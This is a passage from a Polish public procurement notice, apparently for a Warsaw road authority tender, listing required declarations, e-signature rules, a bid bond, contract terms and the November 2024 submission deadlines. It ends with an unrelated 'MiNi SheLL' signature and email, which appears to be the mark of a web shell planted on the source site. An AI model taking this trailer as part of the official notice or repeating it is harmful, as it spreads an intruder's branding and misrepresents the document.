poddającym dane kompresji,<br/>opatrzenie pliku zawierającego skompresowane dokumenty kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym, jest równoznaczne z opatrzeniem wszystkich dokumentów zawartych w tym pliku odpowiednio<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>1. oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy Pzp o niepodleganiu wykluczeniu i spełnianiu warunków udziału w<br/>postępowaniu, Oświadczenie, o którym mowa w art. 125 ust. 1 Ustawy Pzp, należy złożyć pod rygorem nieważności, w<br/>formie elektronicznej, tj. w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, lub postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym (załącznik nr 1 do SWZ)<br/>1.1. w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt 8.9.1.<br/>SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu,<br/>1.2. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w pkt 8.9.1. SWZ, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w<br/>jakim Wykonawca powołuje się na jego zasoby,<br/>2. Wypełniony formularz cenowy (załącznik nr 7 do SWZ) - w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>3. w przypadku, o którym mowa w pkt. 7.2.6. SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy (załącznik nr 5 do SWZ),<br/>4. w przypadku, o którym mowa w pkt. 10.3. SWZ, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów<br/>(załącznik nr 6 do SWZ),<br/>5. stosowne pełnomocnictwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania jest obowiązany, przed upływem terminu składania <br/>ofert, wnieść wadium na cały okres związania ofertą, w wysokości: 24 200,00zł (dwadzieścia cztery tysiące dwieście złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zdm-waw.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com